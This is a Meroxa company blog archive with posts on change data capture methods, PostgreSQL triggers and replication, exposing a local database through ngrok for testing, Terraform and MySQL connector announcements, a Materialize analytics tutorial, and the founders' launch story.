If you need help, reach out tosupport@meroxa.io
Join ourDiscord community.
Follow us onTwitter.

Stream Your Database Changes with Change Data Capture: Part One

Taron Foxworth — Wed, 11 Aug 2021 20:18:00 GMT

Nobody wants to look at a dashboard or make decisions with yesterday’s data. We live in a world where real-time information is a first-class expectation for our users and is critical to make the best decisions inside an organization.

Change Data Capture (CDC) is an efficient and scalable model that simplifies the implementation of real-time systems.

Change Data Capture Diagram

Industry-leading companies likeShopify,Capital One,Netflix,Airbnb, andZendesk, have all published technical articles demonstrating how they have implemented Change Data Capture (CDC) into their data architectures to:

Expose data from a centralized system to event-driven microservices.
Build applications that respond to data events in real-time.
Maintain data quality and freshness within data warehouses and other downstream consumers of data.

In this multi-part series on Change Data Capture, we are going to dive into:

What is Change Data Capture, and how are CDC systems implemented?
What are the ideal CDC use cases, and how to get started with CDC?

Let’s begin.

What is Change Data Capture (CDC)?

The idea of “tracking the changes to a system” isn’t new. Engineers have been writing scripts to query and update data in batches since the idea of programming itself came about. Change Data Capture is a formalization of the various methods that determinehow changes are tracked.

At its core, CDC is a process that allows an application to listen for changes to a data store and respond to those events. The process involves a data store (database, data warehouse, etc.) and a system to capture the changes of the data store.

For example, one could:

CapturePostgreSQL (database) changes and send the change events toKafka usingDebezium (CDC).
Capture changes fromMySQL (database) andPOST to an HTTP Endpoint withMeroxa (CDC).

Real-World Example

Let’s look at a real-world example that would benefit from CDC. Here, we have an example of a table in PostgreSQL:

Example User Data

When information in theUser table changes, the business may need to:

Update the data warehouse, which is the source of truth for business analytics.
Notify the team of a new user.
Keep an additionalUser table in sync with filtered columns for privacy purposes.
Create a real-time dashboard of new user activity.
Capture change events for audit logging.
Store every change in a cloud bucket for historical analytics.
Update an index used for search.

We can build services to perform all of the actions above by acting on a data change event, and if desired, build and manage them independently of each other.

CDC gives us efficiency by acting on events as they occur and scalability by leveraging adecoupled event-driven architecture.

A CDC Event Example

CDC systems will usually emit an event that contains details about the change that occurred. When using a CDC system like Debezium and a new user is created, here is the generated event:

Anatomy of CDC Event

This event describes the schema of the data (schema), the operation that occurred (op), and the data before and afterpayload.

The event’s format, the fidelity of information, and when it is delivered depend on the CDC system’s implementation.

CDC Implementations

Tracking changes to a PostgreSQL database could look very similar or wildly different to tracking changes within MongoDB. It all depends on the environment and the capture method chosen.

The capture method chosen can define:

what operation(s) (insert, update, delete) can be captured.
how the event is formatted.
If the CDC system ispulling the change events or beingpushed to the CDC system.

Let’s look at each of the different methods and discuss some of the pros and cons of each.

Polling

When implementing any database connector, the decision starts with “To poll or not to poll.” Polling is the most conceptually simple CDC method. To implement polling, you need to query the datastore on an interval.

For example, you may run the following query on an interval:

SELECT * from Users;

ThisSELECT * query would be considered thebulk ("give me everything") polling method. While this would be great to capture a snapshot of the current state, downstream consumers would require work to figure out exactly what data changed on each interval.

However, polling can get much more granular. For example, it’s possible to poll only for a primary key:

SELECT MAX(id) from Users;

A system can track the max value of a primary key (id). When the max value increments, this means that anINSERT operation occurred.

Additionally, if a database has anupdateAt column, a query can look at timestamp changes to captureUPDATE operations.

SELECT * from Users WHERE updated_at > 2021-02-08;

Pros and Cons

Easy: Polling is great because it’s simple to implement, deploy, and very effective.

Custom queries are useful: One advantage is that the query used while polling can be customized to fit complex use cases. The query could includeJOINS or transformations performed directly in SQL.

Capturing deletes is hard: With the polling method, it’s much harder to captureDELETE operations. You can't really query a row in a database if it's gone entirely. One solution is to usedatabase triggers to create an "archive" table of deleted records. Then, delete operations become insert operations of a new table that could be polled.

Events are pulled, not pushed: With polling, the event is pulled from the upstream system. For example, when using polling to ingest into a data warehouse, the ingestion would happen when the CDC system decides to poll. In theory, “real-time” can be accomplished with fast enough polling, but this could cause performance overhead to the database.

Performance overhead is a concern: ASELECT * or any complex query doesn't scale very well on massive datasets. One common workaround is by polling a stand-by instance instead of the primary database.

Changes between query times can’t be captured: Another consideration is the data changes between query times. For example, if a system polls every hour and the data changes multiple times within that same hour, you’d only be able to see the change at query times, not any of the intermediate changes.

Database Triggers

Most of the popular databases support triggers of some sort. For example,in PostgreSQL, one can build a trigger that will move a row to a new table when it’s deleted:

CREATE TRIGGER moveDeleted
BEFORE DELETE ON "User"
FOR EACH ROW
EXECUTE PROCEDURE moveDeleted();

Because triggers can effectively listen to an operation and perform an action, database triggers can act as a CDC system.

In some cases, these triggers can be very complex and full-blown functions. For example,in MongoDB, Triggers are written in Javascript:

exports = async function (changeEvent) {
  // Destructure out fields from the change stream event object
  const { updateDescription, fullDocument } = changeEvent;
  // Check if the shippingLocation field was updated
  const updatedFields = Object.keys(updateDescription.updatedFields);
  const isNewLocation = updatedFields.some(field =>
  	field.match(/shippingLocation/)
  );
  // If the location changed, text the customer the updated location.
  if (isNewLocation) {
  // Do something
  }
};

Pros and Cons

Ease of deployment: Triggers are awesome because they are supported out-the-box for most databases and are easy to implement.

Data Consistency: Any current and new downstream consumer doesn’t have to worry about performing this logic because the logic is contained in the database and not the application — in the case of a microservice architecture.

Application logic in databases could be bad: However, databases should not containtoo much application logic. This could result in behavior being too tightly coupled to the database, and one bad trigger could affect an entire data infrastructure. Triggers should be concise and simple.

Every operation is captured: You can build a trigger for each database operation.

Performance overhead is a concern: Poorly written Triggers can also impact database performance for the same reasons as the polling method. A trigger that contained a complex query wouldn’t scale very well on massive datasets.

Streaming Replication Logs

It’s best to have at least a secondary instance of a database running to ensure proper failover and disaster recovery.

In this model, the standby instances of the database need to stay up-to-date with the primary in real-timeand not lose information. The best way to do this today is for the database to write every change occurring to a log. Then, any standby instances can stream the changes from this log and apply the operations locally. Performing the same operations in real-time is what allows the standby instances to “mirror” the primary.

Here are some references on how this works for some of the most popular databases:

CDC can use the same mechanism to listen to changes. Just like a standby database, an additional system can also process the streaming log as it’s updated:

In the PostgreSQL example diagram above, a CDC system can act as an additionalWAL Receiver, process the event, and send to a message transport (HTTP API, Kafka, etc.).

Here is an example of querying changes from PostgreSQL’s WAL using a SQL function provided by the the[test\_decoding](https://www.postgresql.org/docs/10/logicaldecoding-example.html)plugin:

postgres=# SELECT * FROM pg_logical_slot_get_changes('regression_slot', NULL, NULL); 
lsn | xid | data 
-----------+-------+--------------------------------------------------------- 
0/BA5A688 | 10298 | BEGIN 10298 
0/BA5A6F0 | 10298 | table public.data: INSERT: id[integer]:1 data[text]:'1' 
0/BA5A7F8 | 10298 | table public.data: INSERT: id[integer]:2 data[text]:'2' 
0/BA5A8A8 | 10298 | COMMIT 10298 
(4 rows)

In the query response above, it describes the following:

lsn - Log Sequence Number (LSN) - This number describes the current position in the WAL log. It's used by downstream systems when the log has been updated.
xid - Transaction ID - Each transaction to PostgreSQL gets a unique ID.
data - Data about action and operation that occurred.

The format of these change events will be determined based on theLogical Decoding Output Plugin. For example, thewal2json output plugin allows you to output the changes in JSON, which are easier to parse than thetest_decoding plugin output.

PostgreSQL also provides a mechanism tostream these changes as they occur. As you saw in the event example earlier, Debezium also parses the streaming log in real-time and produces a JSON event.

Pros and Cons

Events are pushed: One huge benefit of streaming logs is that the events are being pushed to the CDC system as changes occur (vs. polling). This pushing model allows for real-time architectures. Using theUser table as an example, the data warehouse ingestion would happen in real-time with a streaming log CDC system.

Efficient and Low Latency: Standby instances use streaming logs for disaster recovery, where efficiency and low latency are top priorities. Streaming replication logs is the most efficient means of capturing changes with the least overhead to the database. This process will look differently from database to database, but the concepts still hold.

Every operation is captured: Every transaction occurring to the data store will be written to the log.

Hard to get a complete snapshot of data: Generally, after a certain amount of time (or size), the streaming logs get purged because they take up space. Being so, the logs may not containevery change that occurred, just the most recent.

Need to be configured: Enabling replication logs may require additional configuration, plugins, or even database restart. Performing these changes with minimal downtown could be cumbersome and requires planning.

What’s Next?

Capturing thechanges of data is like a swiss army knife for any application architecture; it is useful for so many different types of problems. Listening, storing, and acting on the changes of any system — particularly a database — allows you to perform real-time replication data between two data stores, break up a monolithic application into scalable, event-driven microservices, or even power real-time UIs.

Streaming replication logs, polling, and database triggers provide a mechanism to build a CDC system. Each has its own set of pros and cons specific to your application architecture and desired functionality.

In thenext article in this series, we are going to dive into:

What are the ideal CDC use cases?
Where can I get started with CDC?

I can’t wait to see what you build 🚀.

Special thanks to@criccomini,@andyhattemer,@misosoup,@devarispbrown, and@neovintage for helping me craft the ideas in this article!

Real-Time Pipelines as Code with the Meroxa Terraform Provider

Taron Foxworth — Fri, 06 Aug 2021 15:29:00 GMT

Making production-ready pipelines still requires a significant amount of time and effort. With the Meroxa CLI and the Meroxa Dashboard, your pipelines are streaming, real-time, and up and running in minutes, not months. Today, we’re adding a new way for you to build pipelines with versioning, speed, and consistency.

Introducing the Meroxa Terraform Provider. 🎉

The provider allows you to:

Provision, modify and destroy various objects on the Meroxa platform as code.
Easily share pipelines with your team.
Manage pipelines next to infrastructure managed with Terraform.

If you’re new to Terraform, it is an open-source infrastructure as code software tool that provides a workflow and tooling to manage cloud infrastructure. Using the Terraform Provider, you can add your data pipeline resources to the list of items that Terraform can manage. For more information, check out the Terraform Getting Started Guide.

Getting Started

To get started with the Meroxa Terraform Provider, require it within yourTerraform File:

terraform {
  required_providers {
    meroxa = {
      version = "1.0"
      source = "meroxa.io/meroxa/meroxa"
    }
  }
}

Now, you can define your Meroxa resources within this Terraform project.

For example, here is an example pipeline that can assist with migration from PostgreSQL to Mongo. It sets up a pipeline keep both databases in sync in real-time:

# Require Provider 
terraform {
  required_providers {
    meroxa = {
      version = "0.1"
      source = "meroxa.io/meroxa/meroxa"
    }
  }
}

# Configure Provider
provider "meroxa" {
  access_token = var.access_token # optionally use MEROXA_ACCESS_TOKEN env var
}

# Define Pipeline
resource "meroxa_pipeline" "pipeline" {
  name = "sync-postgres-mongo"
}

# Configure Postgres Resource
resource "meroxa_resource" "postgres" {
  name = "my-postgres"
  type = "postgres"
  url = "POSTGRES_CONNECTION_URL"
}

# Configure MongoDB Resource
resource "meroxa_resource" "mongo" {
  name = "my-mongo"
  type = "mongodb"
  url = "MONGO_CONNECTION_URL"
}

# The PostgreSQL connector will capture CDC events for 
# every insert, update and delete operation from a Postgres table.
resource "meroxa_connector" "source" {
  name = "from-postgres"
  source_id = meroxa_resource.postgres.id
  input = "User"
  pipeline_id = meroxa_pipeline.pipeline.id
}

# The MongoDB connector will send data to a collection within MongoDB.
resource "meroxa_connector" "destination" {
  name = "to-mongo"
  destination_id = meroxa_resource.mongo.id
  input = meroxa_connector.source.streams[0].output[0]
  pipeline_id = meroxa_pipeline.pipeline.id
}

Once you’ve defined your pipeline, you can use theTerraform CLI to create, update, and destroy your Meroxa Resources.

Within the Meroxa Terraform Provider Documentation, you can view all the different configuration options for each resource type.

As always,

If you need help, reach out tosupport@meroxa.io
Join ourDiscord community.
Follow us onTwitter andLinkedIn.

I can’t wait to see what you build 🚀

Securely Communicate to Your Resources With SSH Tunneling

Taron Foxworth — Thu, 15 Jul 2021 15:30:00 GMT

Data security is at the core of the Meroxa platform. When you build a data pipeline using Meroxa, your data is encrypted in transit and at rest. Today’s platform update adds a new layer of security to Meroxa.

SSH Tunneling is now in public beta.

With SSH Tunneling, you gain the ability to securely communicate between resources that are not publicly available over the Internet. Tunneling is supported for both sources and destinations.

Getting Started

To get started with SSH Tunneling, when youcreate a resource via the Meroxa CLI, provide the new[\--ssh-url](https://docs.meroxa.com/cli/cmd/meroxa-resources-create) option.

This new option allows you to point to a bastion host that will be used for the resource connection. Typically, this host is publicly available to a fixed list of IP addresses and has access to resources that are not available to the public.

After creation, Meroxa will provide a public key you can add to your bastion host environment. Then, you can immediately start building real-time pipelines.

I can’t wait to see what you build 🚀

As always,

If you need help, reach out tosupport@meroxa.io
Join ourDiscord community.
Follow us onTwitter.

Introducing MySQL Connector Beta

Taron Foxworth — Tue, 29 Jun 2021 15:25:00 GMT

Real-time MySQL Change Data Capture (CDC) and ingestion

Meroxa is committed to making real-time data engineering simple. Part of this is giving you access to the databases engineers use most. Today, we’re happy to announce that MySQL, one of the most popular open-source databases for developers, is now in public beta as a source and destination for real-time data streams.

As a source, you can build pipelines that act on changes from MySQL. For example, you can:

Extract Transform Load (ETL) into a Data Warehouse.
Keep a search index up-to-date.
Replicate data to another database.

As a destination, you can capture events from PostgreSQL, Elasticsearch, or any other Meroxa source and send them to MySQL.

With Meroxa, it’s all streaming, real-time, and your pipelines will be up and running in minutes, not months.

Getting Started

To begin sending data to MySQL, perform the following steps:

Create an Account — Create an account using thedashboard or the Meroxa CLI.
Setup — Setup your MySQL instance and acquire the credentials needed to talk to Meroxa.
Add Resource — Use thedashboard or[meroxa resource create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1) command to add to your Meroxa Resource Catalog.

Then, you can start building pipelines.

MySQL Source Connector

As a source, you can capture changes from MySQL and send them toRedshift, Webhooks, Amazon S3, or any other destination.

The MySQL source is a CDC connector that leveragesMySQL’s Binary Log. The binary log contains a list of every change event of a given MySQL instance. This connector will perform an initial snapshot of the data. Then, it will stream everyINSERT,UPDATE,DELETE operation and push the events into a Meroxa stream.

This connector will emit data records in the following format:

To create a source, you can use thedashboard or [meroxa connector create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1) command to create a new connector:

$ meroxa connector create from-mysql-connector \
  --from my-mysql \
  --input Users \
  --pipeline my-pipeline

For more, seeMySQL Source Connector Documentation.

MySQL Destination Connector

As a destination, you can capture events from a Meroxa source and send them to tables in MySQL.

To create a destination, you can use thedashboard or[meroxa connector create](https://docs.meroxa.com/platform/resources/overview#create-a-resource-1) command to create a new connector:

$ meroxa connector create to-mysql-connector \
  --from my-mysql \
  --input $STREAM_NAME \
  --pipeline my-pipeline

For more, seeMySQL Connector Documentation.

I can’t wait to see what you build. 🚀

The MySQL connector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.

As always,

If you need help, reach out tosupport@meroxa.io
Join ourDiscord community.
Follow us onTwitter.

Creating a Soft Delete Archive Table with PostgreSQL

Taron Foxworth — Tue, 08 Jun 2021 20:01:00 GMT

Streaming from Postgres’ Logical replication log is the most efficient means of capturing changes with the least amount of overhead to your database. However, in some environments (i.e., unsupported versions, Heroku Postgres), you’re left with polling the database to monitor changes.

Typically whenpolling PostgreSQL to capture data changes, you can track the max value of a primary key (id) to know when anINSERT operation occurred. Additionally, if your database has anupdateAt column, you can look at timestamp changes to captureUPDATE operations, but it’s much harder to captureDELETE operations.

PostgresTriggers andFunctions are powerful features of Postgres that allow you to listen forDELETE operations that occur within a table and insert the deleted row in a separate archive table. You can consider this a method of performingsoft deletes, and this model is helpful to maintain the records for historical or analytical purposes or data recovery purposes.

In the commands below, we capture deletes from a table calledUser, and the trigger will insert the deleted row into a table calledDeleted_User.

Step One: Create a new table

If you don’t have a table yet, you’ll need to create one. To help, you can easily copy an origin table:

CREATE TABLE “Deleted_User” AS TABLE “User” WITH NO DATA;

Note:WITH NO DATA allows you to copy a table’s structure without data.

Step Two: Create a new Postgres Function

Next, we can create a new function namedmoveDeleted():

CREATE FUNCTION moveDeleted() RETURNS trigger AS $$
	BEGIN
		INSERT INTO "Deleted_User" VALUES((OLD).*);
		RETURN OLD;
	END;
$$ LANGUAGE plpgsql;

Here we are usingVALUES((OLD).*) to send every column to the archive table, but you may update this to omit or even add new columns.

Step Three: Create a new Postgres Trigger

Lastly, we can create a Postgres Trigger namedmoveDeletedthat calls themoveDeleted() function:

CREATE TRIGGER moveDeleted
BEFORE DELETE ON "User"
FOR EACH ROW
EXECUTE PROCEDURE moveDeleted();

That’s it.

If you perform aDELETE operation on theUser table, a new row with the deleted data will move to theDeleted_User table.

Now your archive table will begin to populate, data won’t be lost, and you can now monitor the archive table to captureDELETE operations within your application.

How to Expose PostgreSQL Remotely Using ngrok

Taron Foxworth — Mon, 10 May 2021 15:58:00 GMT

In this guide, we will walk through exposing a local PostgreSQL instance withngrok. This method allows you to quickly test and analyze the behavior of PostgreSQL with data platforms likeMeroxa.For this example, we are going to use ngrok. ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.

Let's begin.

Step One: Running PostgreSQL Locally

Before we begin, you'll need to havePostgreSQL installed and running locally. The easiest and quickest way usingDocker:

$ docker run --rm -p 5432:5432 -e POSTGRES_PASSWORD=secret -e POSTGRES_DB=demo postgres

For more details on configuration, seepostgres on Docker Hub.

Now

Now that PostgreSQL is running on port5432, you can connect to the local databaseoutside of the container usingpsql :

$ psql -U postgres -h localhost -p 5432 postgres

Step Two: Running ngrok and Exposing PostgreSQL

Next, we can create a tunnel using ngrok and expose the locally running database.

First, you'll need todownload and install ngrok, andcreate an account. Then, you can start the tunnel by running the following:

$ ngrok tcp 5432

For more information, seengrok tcp.

Note: You'll need to create an ngrok account to use tcp forwarding.

Step Three: Connecting to PostgreSQL

Now that PostgreSQLand ngrok are running, you can connect to the publically exposed database usingpsql:

$ psql -h 0.tcp.ngrok.io -p 17618 -U postgres -d postgres>

That's it! You can now connect to your local instance over the internet.

What's next?

This method super helpful to quickly test and analyze behavior using PostgreSQL with cloud services. For example, you can add the local PostgreSQL to Meroxa:

$ meroxa resource create localpg --type postgres --url "postgres://postgres:secret@8.tcp.ngrok.io:19272/demo?sslmode=disable"

Note: Since our database is local, SSL is not enabled by default. To connect, you'll need to append?sslmode=disable to the PostgreSQL connection URL.

By adding it as a Meroxa Resource, you can easily capture real-time CDC events for every insert, update, delete operation from a local PostgreSQL table. For more, seePostgreSQL Resource Documentation.

Helpful Resources:

I can't wait to see what you build 🚀.

Analyze Change Data Capture from PostgreSQL with Meroxa and Materialize

Taron Foxworth — Wed, 05 May 2021 19:47:00 GMT

Analyzing the changes that occur to PostgreSQL will not only give you insight into the current state of the data within your application but allows you to dig into thechangesof your database.

Materialize is a streaming database that allows you to query real-time streams using SQL.

Meroxa is a platform that enables you to build real-time data pipelines to capture Change Data Capture (CDC) events (every insert, update, and delete) from PostgreSQL and othersources.

Together, you can create real-time pipelines in Meroxa to stream data from various sources to Materialize and analyze them usingStreaming SQL. The model described in this post offers a robust foundation for a streaming analytics stack.

How it works

For this example, we will build a query (amaterialized view) to analyze the count of the operations (inserts, updates, and deletes) performed to Postgres.

From a high level, here is how it works:

First, we build a pipeline to capture CDC events (inserts, updates, and deletes) from a PostgreSQL database and stream the events to Amazon S3.
Then, add Amazon S3 as a materialized source and build a materialized viewto analyze the CDC events.

The CDC events are streamed to files within a configured S3 bucket as gzipped JSON. Each S3 object contains multiple records, separated by newlines, in the following format:

{
  "schema": {
    "type": "struct",
    "fields": [
      {
        "type": "struct",
        "fields": [
          {
          "type": "int32",
          "optional": false,
          "field": "id"
          },
          ...
        ],
        "optional": true,
        "field": "before"
      }
    ],
    "optional": false,
    "name": "resource_217"
  },
  "payload": {
    "before": {
      "id": 11,
      "email": "ec@example.com",
      "name": "Nell Abbott",
      "birthday": "12/21/1959",
      "createdAt": 1618255874536,
      "updatedAt": 1618255874537
    },
    "after": {
      "id": 11,
      "email": "nell-abbott@example.com",
      "name": "Nell Abbott",
      "birthday": "12/21/1959",
      "createdAt": 1618255874536,
      "updatedAt": 1618255874537
    },
    "source": {
      "version": "1.2.5.Final",
      "connector": "postgresql",
      "name": "resource-217",
      "ts_ms": 1618255875129,
      "snapshot": "false",
      "db": "my_database",
      "schema": "public",
      "table": "User",
      "txId": 8355,
      "lsn": 478419097256
    },
    "op": "u",
    "ts_ms": 1618255875392
  }
}

This record captured from PostgreSQL has two parts: apayload and aschema. Thepayload represents the data captured from the source. In this case, the record contains the operation (op) performed, the data before and after the operation. Also, Meroxa will automatically record theschema of the payload within the record and capture its changes over time.

Prerequisites

Before you begin building, you’ll need:

PostgreSQL Database (e.g., Amazon RDS).
AWS S3 Bucket
Meroxa CLI
Materialize CLI

Step 1: Adding Resources to Meroxa

To begin, you’ll need a Meroxa account and the Meroxa CLI. Then, you can add resources to your Meroxa Resource Catalog. We can do so with the following commands:

Add PostgreSQL resource:

$ meroxa add resource postgresDB --type postgres -u postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB --metadata '{"logical_replication":"true"}'

2. Add Amazon S3 resource:

$ meroxa add resource datalake --type s3 -u "s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET"

For more details about Meroxa Platform access, permissions, or environment-specific instructions, please see:

Step 2: Building the pipeline

Now that you have a resource within your Meroxa Resource Catalog, we can connect them with the meroxa connect command:

$ meroxa connect --from postgres --input public.User --to datalake

The meroxa connect command will create two connectors for you. Alternatively, you can use the meroxa create connector command to create each one separately.

You can view the created connectors with the meroxa list connectors command:

After connecting the resources together, Meroxa will:

Analyze your resources and automatically configure the proper connectors.
Perform initial data sync between source and destination.
Track every insert, update, and delete from Postgres and send to S3 in real-time.

If your pipeline creation was successful, in the S3 bucket you configured, you would see events captured:

We can now add S3 as a source in Materialize.

Step 3: Add S3 as a Materialized Source

Instead of tables of data, you connect Materialize to external sources of data and then create materialized views of the data that Materialize sees from those sources.

In this case, we can add our Amazon S3 bucket as a source:

First, start the Materialize:

$ materialized -w 1

Next, in another terminal, open psql:

$ psql -U materialize -h localhost -p 6875 materialize

Create the materialized source:

CREATE MATERIALIZED SOURCE user_cdc_stream
FROM S3 DISCOVER OBJECTS USING BUCKET SCAN 'bucket-name', SQS NOTIFICATIONS 'bucket-notifications', COMPRESSION GZIP
WITH (region = 'us-east-2')
FORMAT TEXT;

This command creates a source from a bucket in S3 called bucket-name.

To listen to changes from S3, Materialize listens to Amazon SQS. Within the command above, we also configure an SQS queue called bucket-notifications. To create a queue: Amazon Walkthrough: Configuring a bucket for notifications (SNS topic or SQS queue).

Lastly, we can inform Materialize that our files in S3 are compressed with GZIP.

For more details on access/configuration, see Materialized S3 + JSON documentation.

Now that we have a materialized source, we can query it like a table using SQL. For example, you can view the columns of our new table like so:

SHOW COLUMNS FROM user_cdc_stream;

Thetext column contains a single CDC record in the format we mentioned in Step 1.

Step 4: Create a Materialized View

Materialize views are built to handle streams of data and let you run super fast queries over that data. Using the following command, we can create a view to parse the JSON record and represent the information in columns:

CREATE MATERIALIZED VIEW user_cdc_table AS SELECT
(val->'payload'->'after'->>'id')::int AS after_id,
(val->'payload'->'after'->>'email')::text AS after_email,
(val->'payload'->'after'->>'name')::text AS after_name,
(val->'payload'->'after'->>'birthday')::text AS after_birthday,
(val->'payload'->'after'->>'createdAt')::bigint AS after_createdAt,
(val->'payload'->'after'->>'updatedAt')::bigint AS after_updatedAt,
(val->'payload'->'before'->>'id')::int AS before_id,
(val->'payload'->'before'->>'email')::text AS before_email,
(val->'payload'->'before'->>'name')::text AS before_name,
(val->'payload'->'before'->>'birthday')::text AS before_birthday,
(val->'payload'->'before'->>'createdAt')::bigint AS before_createdAt,
(val->'payload'->'before'->>'updatedAt')::bigint AS before_updatedAt,
(val->'payload'->'source'->>'connector')::text AS source_connector,
(val->'payload'->'source'->>'ts_ms')::text AS source_ts_ms,
(val->'payload'->'source'->>'db')::text AS source_db,
(val->'payload'->'source'->>'schema')::text AS source_schema,
(val->'payload'->'source'->>'table')::text AS source_table,
(val->'payload'->'source'->>'snapshot')::text AS source_snapshot,
(val->'payload'->>'op')::text AS op,
(val->'payload'->>'ts_ms')::bigint AS ts_ms,
(val->'schema')::text AS schema
FROM (SELECT text::jsonb AS val FROM user_cdc_stream);

Now, we can act on this view as if it was a SQL table. Let’s say we wanted to see the counts of the different types of operations (inserts, updates, and deletes) occurring to Postgres. We can use the following command:

SELECT op, COUNT(*) FROM user_cdc_table GROUP BY op;

The nice thing is that because materialized views are compostable, we can create another materialized view from queries ofother materialized views:

CREATE MATERIALIZED VIEW op_counts AS SELECT op, COUNT(*) FROM user_cdc_table GROUP BY op;

As our queries become more complex and datasets grow, we can continue to create more and more views. They will all be lighting fast and updated in real-time. A great demo to see this timing in action is theMaterialize Demo.

Usingwatch, we can see execute a query inpsql once per second continuously:

$ watch -n1 'psql -U materialize -h localhost -p 6875 materialize -c "SELECT * FROM op_counts;"'

What’s Next?

Now that you’ve built a pipeline to stream data from Meroxa to Materialize, you can continue to build your real-time streaming analytics stack. Here are a couple of other things you can do:

Building more views:materialized views can be used to transform or even duplicate sources into Materialize.
Adding additional sources:check out other sources in Meroxa (e.g., ElasticSearch). All can be streamed to Materialize using the same steps above.

I can’t wait to see what you build 🚀.

For more information, check out:

Hello World, Meroxa Style.

DeVaris Brown — Tue, 13 Apr 2021 19:49:00 GMT

In early 2019, I was watching a documentary about the Dangote refinery being built in Nigeria. The narrator was describing the refining process for jet fuel and mentioned something like“… and this is where the merox process kicks off, ensuring the jet fuel is free from impurities.”

A light bulb went off.

I spent years at Heroku and frequently heard Marc Benioff say, “Data is the new oil.” If data is the new oil, we wanted to power the refinery. The merox process, but for data.

I met my cofounder Ali Hamidi at Heroku where we both worked on the world’s best platform as a service. I remember the exact moment we realized we were kindred spirits on the same quest and of course it starts with Hacker News. After discussing the technical merits of yet another “revolutionary technology”, I remember us joking about how the data ecosystem was the wild west of well-marketed products that were just repackaged incremental improvements. For some reason this time my snarkiness sparked a different twinkle in Ali’s eye. “Well maybe we should do something about it”. Yes Ali. We should.

Ali and I grabbed a conference room at a coworking space. We discussed what was missing from the data ecosystem that could help data professionals be more productive. A couple hours later, we had a reference architecture for the initial platform offering. As we sat back and looked at all the scribbles on that whiteboard, I remember our collective excitement about the future and thinking, “now the real work begins.”

Meroxa was born.

With a little bit of pre-seed cash in the bank, we needed to talk to potential customers and clarify our ideal customer profile. Is what we were building a necessity or a nice to have? Before starting an accelerator program, I spent the next three months interviewing over one hundred people including data engineers, data analysts, data scientists, and software engineers. It was crucial to understand the bottlenecks to their productivity. We asked them questions about the tools they used, what they liked or didn’t like about their current toolset, their workflow, and how they spent their time-solving data issues for stakeholders. What we found was pretty shocking:

65% of their time spent was on grunt work (data cleaning, integrating data components, maintaining pipelines) and 30% of their time spent was on ad hoc requests from stakeholders, leaving 5% for feature support.
The average time to bring a data pipeline to production was between 3–6 months, despite most companies having dedicated data engineers on staff.
They were armed to the teeth with different tools for different processes, which only complicated their jobs instead of making it easier.
Most of the companies they worked for were making decisions based on data that was stale or inaccurate.

By delivering on the promise of a self-service platform that would reduce the amount of grunt work, we could unlock new levels of productivity and a whole new class of customer experiences powered by real-time data in minutes not months.

Our belief at Meroxa is that anyone can be a data engineer if given the right toolset. In our customer research, it wasn’t uncommon to see engineers deploying 4+ commercial tools and a healthy heaping of open-source offerings environment to orchestrate data. Each of those tools/services have their own configuration profiles and operational complexities requiring the engineers to have deepand broad knowledge. As you can imagine, maintenance is a nightmare anytime something goes wrong. Regardless of industry vertical or company size, the people we interviewed all had the same issues:

Maintaining real-time infrastructure using open source Kafka was a chore and the managed services are expensive.
Commercial ELT and CDP solutions are rigid and don’t handle upstream schema changes well.
Additional instrumentation was needed in their data infrastructure for observability, scaling, and incident triage

And each of the problems were centered around the same set of use cases:

Desire to do real-time data warehouse sync for analytics and dashboard visualizations.
Archival of raw records into a data lake for model training/active learning.
Processing data in real-time to ensure it reaches the destination in the proper format without introducing latency or complexity with external tools

With that knowledge, we built the Meroxa platform to help engineers control the fragmented data-services ecosystem and evolve the conversation from integration to orchestration.

The platform consists of a change data capture service, schema registry, event streaming service, API proxy, and incident-automation framework that allows customers to transform and orchestrate data in real-time to multiple destinations. This is achieved without modifying application code or introducing performance overhead to your production data sources. Customers who previously spent millions of dollars building real-time data infrastructure over multiple years, now have the ability to build production-ready pipelines in minutes using our CLI and dashboard.

After months of design partnerships, pilots, proof of concepts, demos, and a closed developer preview, we are finally ready to unveil our self-service platform to the world. While we’ve put in a ton of hours, this moment would not be possible without the support of our incredible investors including:

Nick Caldwell, Village Global, Adam Gross, Jason Warner, Deon Nicholas, Hustle Fund, and Fredrik Bjork who believed in us when we were just a deck and a dream.
Root Ventures (Lee Edwards) & Amplify Partners (Sarah Catanzaro & Lenny Pruss) who co-led our seed round.
Drive Capital (Andy Jenks & Van Jones) who led our Series A.
And a host of other strategic angels, institutional investors, and scouts including Menlo, Index, Kleiner, Addition, Sequoia, Meritech, Calvin French-Owen, Chris Riccomini, Kelvin Beachum, Tokyo Black (Looker co-founders), and more…

Having raised $19.2M between our Seed and Series A, we’ve assembled one of the best teams to deliver a best-in-class platform and developer experience for our customers.

Today Meroxa takes off.

If you’re excited, we invite you to sign up and get access to our platform atmeroxa.com. No sales calls or solution architects needed. Just plain old productivity in minutes. We’re excited to see what you build next.

DeVaris Brown
CEO, Meroxa

Meroxa - Blog & Insights

How Real-Time Data Pipelines Drive Financial Insights in Fintech

Executive Summary

Key Industry Insights:

Why Real-Time Data is Critical for Fintech Success

Challenges of Legacy Financial Data Processing

Real-Time Pipeline Architecture for Fintech

Key Technologies in Modern Fintech Data Pipelines

Cost Breakdown: Meroxa's Conduit Platform vs Competitors

Cost Projections for Different Fintech Segments

Projected Cost Savings & ROI by Fintech Segment

Performance Benchmark: Meroxa's Conduit Platform vs Competitors

Conclusion & Next Steps

Unlocking the Power of Edge AI with Real-Time Streaming: From Sensors to Insights Using Meroxa

Low-Latency Inference: The Heart of Real-Time Decision-Making

Why Low-Latency Matters

Real-World Applications

Hardware Acceleration: Powering the Edge

The Rise of Specialized Processors

Real-World Applications in Critical Industries

Real-Time Data Pipelines: The Backbone of Edge AI

Enabling Continuous, Actionable Insights

How Meroxa Drives Real-Time Data Pipelines at the Edge

Real-World Use Cases: Data Acquisition in Action

Healthcare Clinical Trials

Manufacturing

Conclusion: Empowering the Future with Meroxa

From Data to Decisions: How Generative AI is Transforming Business in Real-Time

Integrating LLMs into Real-Time Data Workflows

The New Era of Data Pipelines

Real-World Example and Benefits

Technical Workflow Diagram

Challenges to Consider

The Rise of Conversational Analytics

From Dashboards to Dialogues
